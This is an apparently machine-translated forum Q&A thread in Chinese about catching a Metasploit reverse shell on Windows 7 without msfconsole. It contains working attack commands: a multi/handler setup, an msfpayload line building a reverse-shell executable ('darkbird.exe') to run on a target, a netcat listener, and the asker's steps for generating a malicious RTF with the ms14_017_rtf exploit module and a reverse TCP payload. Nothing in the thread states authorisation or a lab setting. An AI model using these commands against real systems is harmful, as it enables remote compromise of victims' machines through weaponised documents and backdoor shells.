2015-11-06 75 views
0

对不起,我的英语。 使用metasploit我为windows 7/windows/shell/reverse_tcp负载生成了漏洞利用。 后来我等待连接使用msfconsole:独立多/处理程序reverse_tcp

use exploit/multi/handler 
set PAYLOAD windows/shell/reverse_tcp 
set LHOST 192.168.182.129 
set LPORT 4444 
exploit 

我成功地连接到命令窗口的线。 但是我需要期待连接而不使用metasploit。我发现了如何创建独立模块,但它仅用于利用。 我需要standalone multi/handler reverse_tcp或简单的代码来监听某个端口,然后访问命令行。

回答

0

我真的不知道你的限制/限制是。
我的猜测是,你想在没有安装metasploit的计算机上“接收shell”。
如果是这样的话,你可以使用msfd(安装在不同的计算机上的Metasploit守护),或者简单的netcat,socat,...

你觉得这是什么:

  • 听力与192.168.1.2的netcat
    # nc -l -p 4444
  • 使用shell_reverse_tcp代替
    # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
  • 对目标执行darkbird.exe
+0

感谢您的回复。我早些时候尝试过nc。连接已设置。但我无法发送命令(目录或其他)。我在服务器上键入dir(其中运行nc),但什么都不发生。 – tiigg

+0

你用什么命令来生成shellcode? –

+0

'使用利用/窗/ FILEFORMAT/ms14_017_rtf'
'设置有效载荷窗户/壳/ reverse_tcp'

'设置文件名readme.rtf'
'设置lhost 192.168.182.129'

'利用'
它生成带有反向tcp负载的rtf文件。然后我在Windows上运行这个文件。而Windows应该连接服务器。 – tiigg